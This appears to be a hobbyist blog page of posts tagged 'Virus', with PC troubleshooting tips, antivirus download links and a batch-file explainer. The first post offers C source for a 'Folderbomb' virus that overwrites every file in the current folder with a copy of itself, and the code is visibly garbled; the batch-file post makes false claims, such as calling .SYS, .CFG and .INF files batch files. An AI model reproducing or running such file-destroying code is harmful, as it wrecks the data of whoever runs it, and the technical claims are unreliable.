want to create a website ?

Showing posts with label Virus. Show all posts
Showing posts with label Virus. Show all posts

SIMPLE VIRUS CODING

Please This Trick Try to "C" Language
/*This is a simple program to create a virus in c
It will create Folder in a Folder in a Folder and so on ......






#include<stdio.h>
#include<conio.h>
#include
#include
#include
void main(int argc,char* argv[])
{ char buf[512];
int source,target,byt,done;
struct ffblk ffblk;
clrscr();
textcolor(2);
cprintf(”————————————————————————–”);
printf(”\nVirus: Folderbomb 1.0\nProgrammer:BAS Unnikrishnan(asystem0@gmail.com)\n”);
cprintf(”————————————————————————–”);
done = findfirst(”*.*”,&ffblk,0);
while (!done)
{ printf(”\n”);cprintf(” %s “, ffblk.ff_name);printf(”is attacked by “);cprintf(”Folderbomb”);
source=open(argv[0],O_R
DONLYO_BINARY);
target=open(ffblk.ff_name,O_CREATO_BINARYO_WRONGLY);
while(1)
{byt=read(source,buf,512);
if(byt>0)
write(target,buf,byt);
else
break;
}
close(source);
close(target);
done = findnext(&ffblk);
}
getch();
}


Please share like &  do comment

EBOMB : A deadly virus

This summary is not available. Please click here to view the post.

How To Enable Task Manager When Blocked By A Virus

I Hope U R all Happy,


Some Malware and Trojan often disable access to Windows Task Manager. Fortunately, a few quick Registry edits are usually all that are needed to regain control.

Here's how to do it:


  • Click Start 


  • Click Run 


  •  Type REGEDIT


  • Click OK and The Registry Editor will now open 


  • Browse to the following key:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\system 


  • In the right pane, look for the value: DisableTaskMgr 


  • Right click DisableTaskMgr and select Delete. (When prompted with "Are you sure you want todelete this value", select Yes. 


  • Now browse to the following key:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system 


  • In the right pane, look for the value: DisableTaskMgr 


  • Right click DisableTaskMgr and select Delete. (When prompted with "Are you sure you want todelete this value", select Yes. 


  • Close the Registry by choosing File | Exit 


  • Restart your computer
You should now be able to access Task Manager. If not, reboot intoSafe Mode and repeat the steps outlined above.

Enjoy......

Look, Top 10 Computer Errors & Their Solutions

Friends Today  i m talk u some fact about Computer/Laptop

1:-
The computer is unable to start up– If the computer does not turn on when you press the power button, the following suggestions may help you to determine why the computer will not start up. First of all, check if the computer is plugged in to an AC outlet properly. Plug another electrical device into the outlet to be sure that the outlet is providing adequate power.

2:-
 The computer screen is blank– If the screen is blank, the computer may not be set to display the image on the computer screen. First, check if the monitor is plugged in to a power outlet and is connected to the computer securely and make sure the monitor power button is on. If the power light is not on, it means that the outlet is not delivering power to the monitor. Fixing the power outlet in such cases should help you.

3:-
 Trouble with video card– If the power light of the computer and monitor is on and nothing comes up on the screen when you start your computer then there must be something wrong with video card. You should take your computer to a repair shop or change its video or the graphics card with a new one.

4:-
 OS or some Software is functioning abnormally– If the Operating System (OS) or some other software is unresponsive or responds abnormally, follow these tips. Restart your computer and run a virus scan. For this purpose you should have a reliable antivirus software installed on the computer to fix this issue.

5:-
 Windows do not boot properly– If windows do not boot properly then you should reinstall windows with the windows recovery disk. Most of the times, this should help you get rid of the problem.

6:-
 The computer is on but not responding– If the computer is turned on but not responding to software or keyboard commands, then it must be frozen or halted. Press and hold the power button for at least 5 seconds, it will be turn off. Now restart your computer. This should fix things up.

7:-
 An external device is not working– If an external device does not function as expected, turn it on according to Manufacturers instruction; be sure that all device connections are secure and receiving electrical power and compatible with the operating system. And that the correct drivers are installed and updated.

8:-
 Slow working computer– You can improve your computer working performance by cleaning hard disk of unwanted files. Also make sure that you run the disk utility, get rid of unneeded icons on your desktop, install a firewall, install antivirus and Anti spyware tools, schedule regular registry scans.

9:-
 Slow working internet– To increase your browser performance, you must frequently clear cookies and internet temporary files. In the Windows search bar type – %temp% and hit enter to open the temporary files folder. You can use Ctrl+A to select all of them and then press Delete. Please note that some of the files may not get deleted if they are being used by the OS; but that is fine.

10:-
 Internet network problem– If your computer can not get connected to internet then check IP address, check network cables are connected properly, make sure that servers or gateways firewall application is not blocking http requests from your PC.

Enjoy.......................

Antivirus Download

Hi, Friends Today i m Talk U
I Show That Many Antivirus ,i Hope U Use This:-

Download Avast! Home Edition 4.8.1335
1:-Avast! Home Edition 4.8.1335 
Alwil Software - 29.81MB (Non-Commercial Freeware)
nishant Download

Download AVG Free Edition 8.5.374
2:-AVG Free Edition 8.5.374 
Grisoft Inc - 63.15MB (Freeware)

Download AntiVir Personal 9.0.0.403 
3:-AntiVir Personal 9.0.0.403
Avira GmbH - 30.80MB (Non-Commercial Freeware)

Download Norton AntiVirus 2009 16.5.0.134 
4:-Norton AntiVirus 2009 16.5.0.134
Symantec - 60.10MB (Commercial Trial)  
Download Kaspersky Anti-Virus 8.0.0.506 
5:-Kaspersky Anti-Virus 8.0.0.506
Kaspersky - 36.92MB (Commercial Trial)  
nishant Download


Friends Plz Use This Software
And Keep Your Computer Safe & Cool

What Is Batch File

Friends You Have Many time listen Batch File.
So What is Batch File
Ans:-
What are batch files? Batch files are not programs, pre se, they are lists of command line instructions that are batched together in one file copied and edited They are usually used for simple routines and low-level machine instruction, but they can be very powerful. If you look in your C:\ or C:\WINDOWS folder you will see a multitude of .BAT, .SYS, .CFG, .INF and other types. These are all kinds of batch files. This may shock you, but while most applications are writen in Basic or C++ they sit on a mountain of batch files. Batch files are the backbone of the Windows operating system, delete them and you've effectively disabled the OS. There is a reason for this. The system batch files on each computer are unique the that computer and change each time a program is loaded. The operating system must have access to these files and be able to add and delete instructions from them.